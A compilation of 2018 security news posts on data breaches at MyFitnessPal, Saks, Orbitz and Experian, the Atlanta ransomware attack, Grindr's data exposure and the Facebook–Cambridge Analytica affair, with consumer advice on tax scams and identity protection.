The Need to Rethink Security For Our Cloud Applications Has Become Urgent. Companies are utilizing the public cloud as their primary route to market for creating and delivering innovative applications.

The post Why Multi-cloud Security Requires Rethinking Network appeared first on The Cyber Security Place.

A week in security (March 26 – April 01)

Last week, we looked at the thought process behind creating a ransomware decryptor, the inner workings of QuantLoader, the ways one can protect their Android devices, the exploit kits we have encountered this winter, the now-known epidemic of data breaches, the coming of TLS 1.3, and the ways one can protect their P2P payment apps.

Other news

  • “Lone wolf” sextortionists pose as hot women behind fake Facebook profiles. (Source: Sophos’s Naked Security Blog)
  • Sad fact: Willing victims of romance scams actually do exist. Not only do they send money to “their partner” whom they haven’t met yet but they also knowingly act as mules. (Source: Security Week)
  • While a majority of IT pros recognize that IoTs are so insecure, not that many are actually doing anything about it. (Source: ZDNet)
  • What happens when you send an application into the background? This SANS diary attempts to answer that. (Source: SANS ISC InfoSec Forums)
  • Well, will you look at that—Monero isn’t that untraceable after all. (Source: Wired)
  • A flaw in the iOS camera application with the way it handles QR codes can be used to redirect users to malicious destinations. (Source: HackRead)
  • Cryptojacking via browsers has been around for a while, and it’s getting more difficult to spot them. (Source: Bleeping Computer)
  • Tax season is getting really close, so scams surrounding this are active with varying payloads. (Source: Proofpoint Blog)
  • As it happens, Under Armor has left some areas uncovered, causing MyFitnessPal to be compromised and affecting 150 million accounts. (Source: The Verge)
  • ‘Cyber bullets’? Cyber bullets! (Source: Fifth Domain)

Stay safe, everyone!

The post A week in security (March 26 – April 01) appeared first on Malwarebytes Labs.

Saks Fifth Avenue, Lord & Taylor Suffer Payment Card Data Breach

Saks Fifth Avenue and Lord & Taylor have both suffered a data breach involving customers’ debit and credit card information. The data breach became apparent on 28 March when Joker’s Stash, a seller of stolen payment card details on underground markets, announced its “BIGBADABOOM-2” sale of five million cards. Working with financial organizations, Gemini Advisory […]… Read More

The post Saks Fifth Avenue, Lord & Taylor Suffer Payment Card Data Breach appeared first on The State of Security.

Over 5 million payment cards compromised in Saks, Lord & Taylor data breach

Russian hackers known as the JokerStash syndicate or Fin7 were selling on March 28 on the dark web payment card data stolen from over 5 million customers of department stores Saks Fifth Avenue, Saks OFF 5TH and Lord & Taylor in New York and New Jersey, writes The New York Times following an investigation carried out by Gemini Advisory.

At the time of research, only 125,000 records were for sale, but Gemini Advisory expects hackers will offer all data in the following months.

The Hudson’s Bay Company, the Canadian owner of the retail chains, confirmed the breach on Sunday, and assures customers that only in-store purchases were affected, due to a corruption of the cash registers.

“We have become aware of a data security issue involving customer payment card data at certain Saks Fifth Avenue, Saks Off 5th and Lord & Taylor stores in North America,” the Canadian corporation’s website reads. “We have identified the issue, and have taken steps to contain it. Once we have more clarity around the facts, we will notify our customers quickly and will offer those impacted free identity protection services, including credit and web monitoring.”

According to Gemini Advisory, the estimated window of compromise is between May 2017 and the present, and “the entire network of Lord & Taylor and 83 Saks Fifth Avenue locations have been compromised.”

An investigation is ongoing, but chances are it will show that hackers sent phishing emails to employees asking them to either open a link or download an attachment, installing a backdoor in the company network. This would have allowed hackers to install manipulating software into the cash register systems and steal credit card numbers.

These are not the only chains hit by the hacker group, but this is the largest data breach that hit retail companies. Whole Foods, Chipotle, Omni Hotels & Resorts and Trump Hotels are also among the victims.

The Hudson’s Bay Company will reach out to their customers and offer identity-protection services. Customers are advised to monitor their accounts, review their statements and get in touch with their card issuers if suspicious activity is detected.

Why IT Compliance Is Critical for Cyber Security

IT compliance is sort of like the forgotten stepchild of cyber security. It doesn’t get as much attention as data breach prevention technologies and policies, even though it is equally

The post Why IT Compliance Is Critical for Cyber Security appeared first on The Cyber Security Place.

150 million MyFitnessPal users affected in Under Armour data breach

Under Armour on Thursday announced that over 150 million customers using MyFitnessPal, its nutrition tracking app, were hit by a data breach in late February, earlier this year.

According to Under Armour, they discovered the breach earlier this week and said that an “unauthorised party” had acquired this data. Once they were aware of the breach, they took steps to alert the users using in-app messages as well as email.

They are currently working with data security firms and coordinating with law enforcement authorities to get to the bottom of the breach.

"The investigation indicates that the affected information included usernames, email addresses, and hashed passwords—the majority with the hashing function called bcrypt used to secure passwords," the company said in a statement.

Under Armour said that the attackers would not have been able to access information such as users' Social Security numbers and driver's license numbers, or payment information, in the breach but usernames, email addresses, and password data were taken.

The company is now urging MyFitnessPal users to change their passwords immediately, along with reviewing any suspicious activity in their account. It has also warned its users to be cautious of any emails or unsolicited messages in light of the breach, and to not give away personal data.

The app lets people track their calorie intake, diet, and exercise routines, and was acquired by Under Armour in 2015 for $475 million.

Russian Hacker Who Allegedly Hacked LinkedIn and Dropbox Extradited to US

A Russian man accused of hacking LinkedIn, Dropbox, and Formspring in 2012 and possibly compromising personal details of over 100 million users, has pleaded not guilty in a U.S. federal court after being extradited from the Czech Republic. Yevgeniy Aleksandrovich Nikulin, 30, of Moscow was arrested in Prague on October 5, 2016, by Interpol agents working in collaboration with the FBI, but he

Grindr gay-dating app exposed millions of users’ private data, messages, locations

According to an NBC report, the Grindr gay-dating app was affected by 2 security issues (now patched) that could expose the information of its more than 3 million daily users.

Every day we read of a new data breach, in some cases, exposed data could have a severe impact on the victim.

According to an NBC report, the Grindr gay-dating app was affected by 2 security issues (now patched) that could expose the information of its more than 3 million daily users.

An attacker could have exploited the feature to access location data, private messages to other users, and profile information, even if they’d opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working at his website C*ckblocked that allowed users to see who blocked them on Grindr.

Faden discovered that once a Grindr logged in his service, it was possible to access to a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

NBC noted that C*ckblocked exploited a “similar security loophole” to one that was recently used by Cambridge Analytica to create a profile of more than 50 million Facebook users.

“Grindr makes public the location of many of its users, but allows for users to opt out of this feature. Faden found that he could find the location of users who had opted out if they connected their Grindr profiles through his third-party website.reported NBC.

“One could, without too much difficulty or even a huge amount of technological skill, easily pinpoint a user’s exact location,” Faden explained. 

Grindr gay-dating app

Grindr confirmed it was aware of the issue discovered by Faden and it had addressed them. Faden shut down his service after Grindr changed its policy on access to data on which users had blocked other users.

Grindr recommends its users to avoid using Grindr logins for other apps or web services.

“Grindr moved quickly to make changes to its platform to resolve this issue,” the company said in the statement. “Grindr reminds all users that they should never give away their username and password to any third parties claiming to provide a benefit, as they are not authorized by Grindr and could potentially have malicious intent.”

The company published the following statement on its official Twitter account:

In the past, other experts found similar issues in the Grindr service, in 2014 researchers at cybersecurity firm Synack found that it allowed any user see the profiles and locations of people. Unfortunately, the problems were not completely fixed and two years after Wired published an interesting article about the experiments of experts that were still able to figure out users’ locations.

Pierluigi Paganini

(Security Affairs – privacy, Grindr gay-dating app)

The post Grindr gay-dating app exposed millions of users’ private data, messages, locations appeared first on Security Affairs.

Over 150 Million MyFitnessPal Accounts Impacted by Massive Data Breach

Maintaining our health is a priority for many of us. So it’s only natural that in the modern digital age, we’ve developed thousands of health apps and gadgets to help monitor our fitness and keep us on track. One of the most popular health apps out there is MyFitnessPal, with which users share their daily diet and fitness information to determine optimal caloric intake. Only now, these users may have unwittingly shared their data with a group of cybercriminals that have breached the popular app. Just yesterday, it was revealed that 150 million accounts for the MyFitnessPal site and app were breached earlier this week.

As of now, few details have emerged about how the attack happened or what the intention was behind it. While the breach did not compromise financial data, large troves of other personal information were affected. The impacted information included usernames, email addresses, and hashed passwords.

MyFitnessPal, which is a subsidiary of Under Armour, has notified affected customers of the breach (see below), and Under Armour has released an official statement making the public aware of the attack as well. So now that potentially impacted customers are aware of the breach – what next?

There are a few security steps affected customers should take immediately. Start by following these pointers below:

  • Change your password immediately. If you are a MyFitnessPal user, you should first and foremost change the password to your account. Then, you should also change your password for any other account on which you used the same or similar information used for your MyFitnessPal account.
  • Stay vigilant. Another way cybercriminals can leverage stolen emails is by using the list for phishing email distribution. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided. Better to just delete the email entirely.
  • Monitor your credit card statement. If cybercriminals are able to leverage the data to gain access to accounts, there’s potential they gain access to financial data, too. And as we know, it’s better to be safe than sorry. Be sure to consistently scan your credit card statement for any suspicious or irregular activity. If you see anything odd, flag to your bank immediately.
  • Lock down your mobile device. If for some reason the MyFitnessPal app is impacted by this attack, or in the future, it’s best you ensure the data stored on your mobile device is secure. To do just that, use a mobile security solution such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Over 150 Million MyFitnessPal Accounts Impacted by Massive Data Breach appeared first on McAfee Blogs.

Fitness Hacker: Under Armour breach affects 150m

The fitness gear maker Under Armour said on Thursday that a breach of its MyFitnessPal website in February resulted in the theft of data on 150 million customers.  Under Armour said it learned of the incident on March 25. The breach affected individuals with MyFitnessPal user accounts. Personal information including the individuals’ user...

Read the whole entry... »

Related Stories

MyFitnessPal hacked, 150 million user accounts compromised

American manufacturer of sports gear, Urban Armour, announced that 150 million MyFitnessPal accounts were breached following the largest cyber incident to take place so far this year. Although the nutrition application fell victim to a data breach in late Frebruary 2018, it was only detected this week and users started receiving notification emails four days later.

Hackers did not have access to sensitive data such as government issued identification information, Social Security numbers, driver’s license numbers or payment card data, as this was processed separately, Under Armour stated. The only data that may have been affected are emails, user names and hashed passwords.

“We continue to monitor for suspicious activity and to coordinate with law enforcement authorities,” the company said. Urban Armour is working with law enforcement to detect how hackers infiltrated the network and how the data was stolen.

Following the attack, company shares dropped 4 percent.

In the meantime, because emails and passwords are very valuable to hackers, the company urges all users update their passwords as soon as possible.

“Four days after learning of the issue, the company began notifying the MyFitnessPal community via email and through in-app messaging. The notice contains recommendations for MyFitnessPal users regarding account security steps they can take to help protect their information,” Under Armour said in a statement. “The company will be requiring MyFitnessPal users to change their passwords and is urging users to do so immediately.”

MyFitnessPal was purchased by Urban Armour for $475 million in 2015 when it had 80 million users. The application not only monitors nutrition and fitness activity, but it can also be linked to other accounts such as Fitbit, to monitor calories lost during exercise, RunKeeper, Paer Pedometer and Polar Flow, among others.

Steps to Take to Beat the Insider Threat in 2018

Hackers get the headlines, but a data breach is more likely to originate inside your own office walls. Errors, negligence and malicious intent by employees are the leading causes of

The post Steps to Take to Beat the Insider Threat in 2018 appeared first on The Cyber Security Place.

Under Armour data breach affected about 150 million MyFitnessPal users

Under Armour became aware of a potential security breach on March 25, the company said an unauthorized party had accessed MyFitnessPal user data.

Under Armour learned of the data breach on March 25,  it promptly reported the hack to law enforcement and hired security consultants to investigate the incident.

Attackers hacked the MyFitnessPal application that is used by its customers to track fitness activity and calorie consumption.

MyFitnessPal under armour

According to the firm, an unauthorized party obtained access to user data, including usernames, email addresses, and “hashed” passwords.

The good news is that hackers did not access financial data (i.e. payment card data) or social security numbers and drivers licenses.

“On March 25, the MyFitnessPal team became aware that an unauthorized party acquired data associated with MyFitnessPal user accounts in late February 2018. The company quickly took steps to determine the nature and scope of the issue and to alert the MyFitnessPal community of the incident.” reads a statement issued by the company.

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers), which the company does not collect from users. Payment card data was also not affected because it is collected and processed separately. The company’s investigation is ongoing, but indicates that approximately 150 million user accounts were affected by this issue.”

The company notified de data breach by email and in-app messaging to update settings to protect account information.

“The notice contains recommendations for MyFitnessPal users regarding account security steps they can take to help protect their information. The company will be requiring MyFitnessPal users to change their passwords and is urging users to do so immediately.” continues the statement.

Pierluigi Paganini

(Security Affairs – Under Armour, data breach)

The post Under Armour data breach affected about 150 million MyFitnessPal users appeared first on Security Affairs.

The data breach epidemic: no info is safe

By now it’s obvious that data security technology and protocols haven’t kept pace with the needs of consumers. Even as more people trust their most sensitive personal information to online apps and services, databases are routinely exposed. In 2017 alone, we learned about massive data breaches from major organizations like Equifax, Uber, and Verizon.

In other words: We’re in the midst of a data breach epidemic.

How bad is it? To help better understand the leaky state of data, TruthFinder created this infographic based on data from the Identity Theft Center. In 2005, there were 157 publicly-reported data breaches of sensitive information. By 2017, that number increased tenfold to 1,579 data breaches.

The severity of breaches is increasing, too. The first breach that leaked over 1 million credit card numbers occurred in 2005, but now we hear about breaches that expose tens or hundreds of millions of records every few months.

Check out TruthFinder’s infographic below. It provides an idea of the serious challenge that security professionals face as they work to turn the tide and secure personal information.

 

data breach epidemic

The post The data breach epidemic: no info is safe appeared first on Malwarebytes Labs.

A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data

This article was published on LinkedIn on March 27, 2018. You can read the original post here.

In my first LinkedIn article, I’d like to welcome you to the future. Not too far in to the future. But, it’s January 2019 and unfortunately cyber criminals are stealing your data. You’re scrambling to respond, hustling to contain, scurrying to an emergency board meeting. It’s a bad day.

You may be thinking that this isn’t going to happen to you, but many recent headlines say otherwise. So this is my humble letter that I wish I had gotten to you 10 months ago. Today.

From my chair, running IBM’s cybersecurity unit, I get to see things that don’t even make it to the news. Yesterday, we actually helped check references on a hacker for a customer wondering if they should pay bitcoin to get their servers back. This morning, my research team in Israel uncovered a new organized criminal circuit developing a new method to steal money from banks in Brazil. And just in the last 24 hours, my threat intelligence team received indicators of 30 new domains registered by hackers as command and control servers for their malware.

But here’s the thing…even though cybercrime is becoming significantly more sophisticated, there are things we can do that can make a difference. Here are my current top three:

1. Prepare Your Response.

My first advice is that “response” isn’t something that should be considered after a breach is detected, but rather something that needs to be planned and rehearsed way ahead of time.

An effective response to a cyber incident requires preparation and planning — a playbook — as well as training and rehearsing, in the same way hospitals prepare for emergencies. As we’ve seen with recent cyberattacks, often a company’s response can do more damage than the breach.

Last year IBM opened the world’s first “cyber range” for the private sector — a place where clients come for rigorous training to prepare for a potential cyberattack. It’s been an eye opener for us and the 1,400-plus people who have trained there.

Our big take away is that this isn’t just a technical team problem — the response needs to span every function in your organization. An effective response plan includes not just the security team’s role in detecting and remediating a breach, but how your organization reacts to regulators, your Board of Directors, law enforcement, clients, employees, the media and other constituents.

Such training and rehearsing helps organizations develop and regularly update a highly detailed and coordinated response plan, and build “muscle memory” that can be thrown into action when a breach occurs.

Most organizations don’t have this. A study we released this week shows nearly 80 percent of organizations surveyed said they cannot remain resilient after a cyberattack due to a lack of planning. And the longer it takes to respond, the higher the costs. For example, a breach contained in less than 30 days saves an organization, on average, nearly $1 million.

2. Change the Game With AI.

AI has the capability to ingest, comprehend and analyze the enormous amount of security data, in whatever forms, that are out there today, and can be deployed quickly. It will help you detect and respond to cyberattacks at speed and scale. More than that, cognitive systems make correlations that provide insight to detect potential breaches much faster than humans alone.

AI will give your security analysts much needed help in finding the needle in the haystack so they can concentrate on stopping the attack.

AI in the form of machine learning enables you to do things like determine if an employee’s identity has been compromised by deeply understanding user behavior and detecting anomalies that could indicate an insider threat. Machine learning can automatically scan new applications for vulnerabilities so developers can continue to move quickly, confident that their app is secure. And when it comes to mobile, AI can see what’s going on at the endpoint and dynamically make recommendations on policies, patches and relevant best practices to keep devices secure.

3. Master the Basics.

Good security hygiene — from keeping software patches updated to scanning applications for vulnerabilities — still count, maybe more than ever. And from where I sit, not enough companies are focusing on the mundane, hard work of getting the basics right — 100 percent of the time. Any less than that will leave you open to an attack.

Think about cyber security the same way that an engineering or manufacturing company thinks about safety and quality. An auto manufacturer would never accept just a few defective parts leaving the plant. An oil company would not be satisfied losing five percent of its drilling rigs. You should not be satisfied with anything less than perfect either. Drive that into your culture.

I’m not saying these so-called basics are easy to get right. I know your teams are challenged with an enormous — and growing — amount of security data. Whether it’s the potentially 200,000 security events you see every day, or the 60,000 alert blogs your security analysts need to read each month — all of which needs to be analyzed quickly to find anomalies that may indicate a pending cyberattack. And the significant skills shortage we’re facing in cybersecurity, with an estimated 1.5 to 2 million unfilled security jobs by the end of this decade, is making it even more difficult.

But at the end of the day, this quality control is worth the effort. Mastering these basics from the outset will allow you to react more quickly in the wake of an attack — potentially saving millions of dollars, and significant losses to your reputation. Not only that, it will also help close the gaps so that you’re dealing with less of these incidents in the first place.

To wrap up, cybercrime is one of our generation’s most significant issues, equally impacting the public and private sector, as well as consumers and citizens. The basics matter, how you handle an attack makes all the difference in the world, and with AI we have a fighting chance to get ahead of the criminals.

The post A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data appeared first on Security Intelligence.

Taking the Long View of Breach Fallout

In this industry perspective, Thomas Hofmann, the Vice President of Intelligence at the firm Flashpoint warns that the effects of data breaches can often be felt months or years after the actual incident, as stolen data bubbles up in underground marketplaces. He has three pieces of advice for companies that want to develop an incident response...

Read the whole entry... »

Related Stories

Businesses know breaches are happening, but do they know how, why and when?

Nearly four in five companies (79%) were hit by a breach in the last year, according to Balabit. Their research also revealed that 68% businesses expect to be impacted by further breaches this year, with more than a quarter anticipating a breach to occur within the next six months. The Unknown Network Survey, deployed in the UK, France, Germany and the US, reveals the attitudes of 400 IT and security professionals surrounding their IT security … More

The post Businesses know breaches are happening, but do they know how, why and when? appeared first on Help Net Security.

Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols

Despite the lack of bright-line procedures, there are five risk reduction measures a company may consider implementing to reduce its potential exposure to cyber breaches, strengthen its security protocols, and

The post Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols appeared first on The Cyber Security Place.

The City of San Diego is suing the Experian credit agency for 2013 security breach

According to the lawsuit filed by San Diego city attorney Mara Elliott the Experian credit agency never notified the 2013 security breach to the affected consumers as required under California law.

The City of San Diego, California is suing the Experian credit agency for the security breach that the company suffered in 2013.

“San Diego City Attorney Mara Elliott has filed a lawsuit against consumer credit giant Experian, contending the company suffered a massive data breach that affected 250,000 people in San Diego and millions more — but never told customers about it.” states a blog post published on The San Diego Union-Tribune.

“Elliott’s office cited the Internal Revenue Service in saying hackers filed more than 13,000 false returns using the hacked information, obtaining $65 million in fraudulent tax refunds.”

According to the lawsuit filed by San Diego city attorney Mara Elliott, the security breach that was first reported by the popular expert Brian Krebs, lasted for nine months ending in 2013. The company never notified it to the affected consumers as required under California law.

According to The San Diego Union-Tribune, the city attorney argued that data belonging to some 30 million consumers could have been stolen, including information for 250,000 people in San Diego.

According to Krebs, the Vietnamese man Hieu Minh Ngo ran an identity theft service (Superget[dot]info and Findget[dot]me) and gained access to sensitive consumer information by posing himself as a licensed private investigator in the United States.

The Identity theft service superget[]info was based on data from consumer databases maintained by a company that Experian purchased in 2012.

The man was paying Experian thousands of dollars in cash each month for access to 200 million consumer records, then he was reselling them to more than 1,300 users of his ID theft service.

The man was arrested by US authorities and pleaded guilty to identity fraud charges, he was sentenced in July 2014 to 13 years in jail.

In December 2013, an executive from Experian told Congress that the company was not aware of any consumers that were a victim of a scam-related to the stolen data.

The court order is asking the company to formally notify consumers whose personal information was involved in the security theft and to pay costs for identity protection services for those people.

“The law carries penalties up to $2,500 for each violation, meaning the company could be facing potentially millions in fines.” The San Diego Union-Tribune added.

Pierluigi Paganini

(Security Affairs – Experian security breach, tax refund frauds)

The post The City of San Diego is suing the Experian credit agency for 2013 security breach appeared first on Security Affairs.

Don’t Get Duped: How to Spot 2018’s Top Tax Scams

It’s the most vulnerable time of the year. Tax time is when cyber criminals pull out their best scams and manage to swindle consumers — smart consumers — out of millions of dollars.

According to the Internal Revenue Service (IRS), crooks are getting creative and putting new twists on old scams using email, phishing and malware, threatening phone calls, and various forms of identity theft to gain access to your hard earned tax refund.

While some of these scams are harder to spot than others, almost all of them can be avoided by understanding the covert routes crooks take to access your family’s data and financial accounts.

According to the IRS, the con games around tax time regularly change. Here are just a few of the recent scams to be aware of:

Erroneous refunds

According to the IRS, schemes are getting more sophisticated. By stealing client data from legitimate tax professionals or buying social security numbers on the black market, a criminal can file a fraudulent tax return. Once the IRS deposits the tax refund into the taxpayer’s account, crooks then use various tactics (phone or email requests) to reclaim the refund from the taxpayer. Multiple versions of this sophisticated scam continue to evolve. If you see suspicious funds in your account or receive a refund check you know is not yours, alert your tax preparer, your bank, and the IRS. To return erroneous refunds, take these steps outlined by the IRS.

Phone scams

If someone calls you claiming to be from the IRS demanding a past due payment in the form of a wire transfer or money order, hang up. Imposters have been known to get aggressive and will even threaten to deport, arrest, or revoke your license if you do not pay the alleged outstanding tax bill.

In a similar scam, thieves call potential victims posing as IRS representatives and tell potential victims that two certified letters were previously sent and returned as undeliverable. The callers then threaten to arrest if a payment the victim does not immediately pay through a prepaid debit card. The scammer also tells the victim that the purchase of the card is linked to the Electronic Federal Tax Payment System (EFTPS) system.

Note: The IRS will never initiate an official tax dispute via phone. If you receive such a call, hang up and report the call to the IRS at 1-800-829-1040.

Robo calls

Baiting you with fear, scammers may also leave urgent “callback” requests through prerecorded phone robot or robo calls, or through a phishing email. Bogus IRS robo often politely ask taxpayers to verify their identity over the phone. These robo calls will even alter caller ID numbers to make it look as if the IRS or another official agency is calling.

Phishing schemes

Be on the lookout for emails with links to websites that ask for your personal information. According to the IRS, thieves now send very authentic-looking messages from credible-looking addresses. These emails coax victims into sharing sensitive information or contain links that contain malware that collects data.

To protect yourself stay alert and be wary of any emails from financial groups or government agencies Don’t share any information online, via email, phone or by text. Don’t click on random links sent to you via email. Once that information is shared anywhere, a crook can steal your identity and use it in different scams.

Human resource/data breaches

In one particular scam crooks target human resource departments. In this scenario, a thief sends an email from a fake organization executive. The email is sent to an employee in the payroll or human resources departments, requesting a list of all employees and their Forms W-2.  This scam is sometimes referred to as business email compromise (BEC) or business email spoofing (BES). 

Using the collected data criminals then attempt to file fraudulent tax returns to claim refunds. Or, they may sell the data on the Internet’s black market sites to others who file fraudulent tax returns or use the names and Social Security Numbers to commit other identity theft related crimes. While you can’t personally avoid this scam, be sure to inquire about your firm’s security practices and try to file your tax return early every year to beat any potentially false filing. Businesses/payroll service providers should file a complaint with the FBI’s Internet Crime Complaint Center (IC3).

As a reminder, the IRS will never:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

If you are the victim identity, theft be sure to take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS to phishing@irs.gov (and then delete the emails).

This post is part II of our series on keeping your family safe during tax time. To read more about helping your teen file his or her first tax return, here’s Part I.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Don’t Get Duped: How to Spot 2018’s Top Tax Scams appeared first on McAfee Blogs.

City of Atlanta systems infected with ransomware; sensitive data at risk

The FBI and the US Department of Homeland Security are investigating a cyberattack against the municipality of Atlanta, said Atlanta Mayor Keisha Lance Bottoms. The city’s computer systems were taken offline on Thursday following a ransomware infection that encrypted data, holding it hostage while demanding a ransom in bitcoin.

City officials confirmed on Twitter that the incident caused “outages on various customer-facing applications, including some that customers may use to pay bills or access court-related information.”

The 911 emergency and response systems, police department systems, airport operations, water and public safety were not affected. The municipality hasn’t yet decided whether to pay the ransom, and is still investigating the nature of the damage on the network servers.

There is no strong evidence to indicate hackers accessed any personal information belonging to city employees and citizens, but all are encouraged to remain vigilant and monitor their credit cards and online accounts for illegal activities in case data has been stolen.

“This is a very serious situation,” Bottoms said. “We don’t know the extent, so I would ask for people to assume that you may be included. Let’s just assume that if your personal information is housed by the City of Atlanta, whether it be because you are a customer who goes online and pays your bills or any employee or even a retiree, we don’t know the extent, so we just ask that you be vigilant.”

 

Facebook and Cambridge Analytica – What’s Happened So Far

Top Story— Facebook has just lost over $60 billion in market value over the past two days—that's more than Tesla's entire market capitalisation and almost three times that of Snapchat. Facebook shares plunge over revelations that personal data of 50 million users was obtained and misused by British data analytics firm 'Cambridge Analytica,' who reportedly helped Donald Trump win the US

Does Patching Make Perfect?

We’ve heard it time and time again: patches and updates are the key to mitigating vulnerabilities that lead to epic Equifax-sized breaches. The logic goes that security incidents can be

The post Does Patching Make Perfect? appeared first on The Cyber Security Place.

DevOps Security Watch: Three Trends To Track In 2018

In the face of incessant competition, countless organizations are turning to DevOps to improve efficiency and accelerate innovation. While this approach delivers proven benefits, DevOps is also creating new security

The post DevOps Security Watch: Three Trends To Track In 2018 appeared first on The Cyber Security Place.

Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected

We all love a good getaway, and as we look ahead to spring and summer, most of us are already planning our next vacation. To do that, we’ll tap one of the many online travel agencies out there to help us organize our plans. Only now, some travel-goers may have to stop trip planning so they can start planning for credit monitoring, as one of the most popular travel agencies, Orbitz.com, was hit with a data breach that may have exposed as many as 880,000 payment cards.

The online travel agency reported two separate data disclosures, as an attacker may have accessed customers’ personal information shared on Orbitz.com and a handful of associated websites between Jan. 1, 2016 between Dec. 22, 2016.

What’s more – in addition to the payment cards, hackers may have also stolen customers’ full name, date of birth, phone number, email address, physical and/or billing address and gender information. Now, with all this personal information potentially out in the open, it’s important affected customers start thinking about protecting their personal identities. To do just that, follow these tips:

  • Regularly review your online account info. Things like regularly reviewing transactions online and making sure account contact info hasn’t changed are good for keeping tabs on anyone trying to hijack your account.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With this breach and others before it, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected appeared first on McAfee Blogs.

880,000 payment cards data breached in Orbitz security incident

Travel booking website Orbitz, part of online travel agency Expedia, confirmed a data security incident was detected on March 1, possibly exposing the personal information associated with some 880,000 payments cards.

The breach affected both the partner and consumers platforms between 2016 and 2017. American Express announced its platforms have not been compromised.

“We took immediate steps to investigate the incident and enhance security and monitoring of the affected platform,” Orbitz said. “As part of our investigation and remediation work, we brought in a leading third-party forensic investigation firm and other cybersecurity experts, began working with law enforcement and took swift action to eliminate and prevent unauthorized access to the platform.”

Following the investigation the company believes hackers may have accessed names, payment card information, dates of birth, phone numbers, email addresses, physical and/or billing addresses and gender. Attackers did not have access to social security numbers (for US customers), passport and travel information and there is no strong evidence that any data was stolen as a result of this incident.

“To date, we do not have direct evidence that this personal information was actually taken from the platform and there has been no evidence of access to other types of personal information, including passport and travel itinerary information,” Orbitz said.

Orbitz is reaching out to all affected customers and offers credit monitoring and identity protection free of charge for one year.

Expedia’s Orbitz Says 880,000 Payment Cards Compromised in Security Breach

Chicago-based online travel booking company Orbitz, a subsidiary of Expedia, reveals that one of its old websites has been hacked, exposing nearly 880,000 payment card numbers of the people who made purchases online. The data breach incident, which was detected earlier this month, likely took place somewhere between October 2016 and December 2017, potentially exposing customers' information

Survey: 48 Percent of US Government Employees Take No Responsibility for Cybersecurity Risks

A recent survey revealed that only 13 percent of U.S. government employees believe they are personally responsible for addressing cybersecurity risks, and 48 percent take no responsibility at all.

The report from Dtex Systems, “Uncovering the Gaps: Security Perceptions and Behaviors of Today’s Government Employees,” surveyed 1,000 public and private sector employees and extracted a subset of government employees as the basis for its findings.

In addition to the fact that nearly half of respondents denied any responsibility for security, the study also found that 1 in 3 government employees believe they are more likely to be struck by lightning than to suffer a data breach.

A False Sense of Security

CNBC suggested that the survey respondents may have a false sense of confidence, pointing out that U.S. government spending on cybersecurity jumped from $7.5 billion in 2007 to $28 billion in 2016. That increase is largely in response to the constant nature of threats such as phishing and ransomware: According to a Symantec report, 1 in 131 emails sent in 2017 contained malicious attachments, and ransomware increased by 36 percent over the previous year.

“We’re all — as individuals, as organizations and as a country — facing near constant security attacks from trusted insiders, malicious cybercriminals or nation-state actors,” said Christy Wyatt, CEO at Dtex Systems, as quoted by CNBC.

Despite that investment, the Dtex survey revealed that less than half of government employees are wary of emailing confidential data, ignoring or working around security protocols, or downloading files from websites they haven’t visited before. Meanwhile, only 43 percent said they had ever reported a colleague who showed risky behavior, even though 86 percent said they believe it is important to do so.

Government Contractors Fail to Address Cybersecurity Risks

It’s not just public sector employees that fail to take IT security seriously. Nearly half of the government contractors surveyed for a BitSight study earned a grade of “below C” in terms of how well they applied the National Institute of Standards and Technology (NIST)’s Protective Technology countermeasures. Some issues included the use of older browser versions with security vulnerabilities, insufficient email protection and network encryption that didn’t work as well as it should.

The post Survey: 48 Percent of US Government Employees Take No Responsibility for Cybersecurity Risks appeared first on Security Intelligence.

Facebook caught up in political data scandal; denies data breach

Lawmakers from the US and Europe demand explanations from Facebook following statements that it shared user data with Cambridge Analytica, a political analytics firm linked to US President Donald Trump,  while the 2016 presidential election was in full swing, writes The New York Times. By using the data to profile users, the company may have helped Trump win the presidential election.

User data was collected through an application named “thisisyourdailylife,” created by University of Cambridge psychology lecturer Dr. Aleksandr Kogan. Under the name Global Science Research (GSR), Kogan asked users to take part in a survey posing as academic research material, in exchange for a small fee.  More than 270,000 users willfully took the survey, but through their profiles Kogan harvested the data of over 50 million users, who had not set their profiles to private.

According to Facebook, the data scandal is not the result of a breach.

“The claim that this is a data breach is completely false,” reads a company update from March 17, 2018, 9:50 AM. “Aleksandr Kogan requested and gained access to information from users who chose to sign up to his app, and everyone involved gave their consent. People knowingly provided their information, no systems were infiltrated, and no passwords or sensitive pieces of information were stolen or hacked.”

On Friday, Facebook also confirmed theyit became aware of the situation in 2015, following complaints from users. It removed the application from the network and asked Kogan to delete the data.

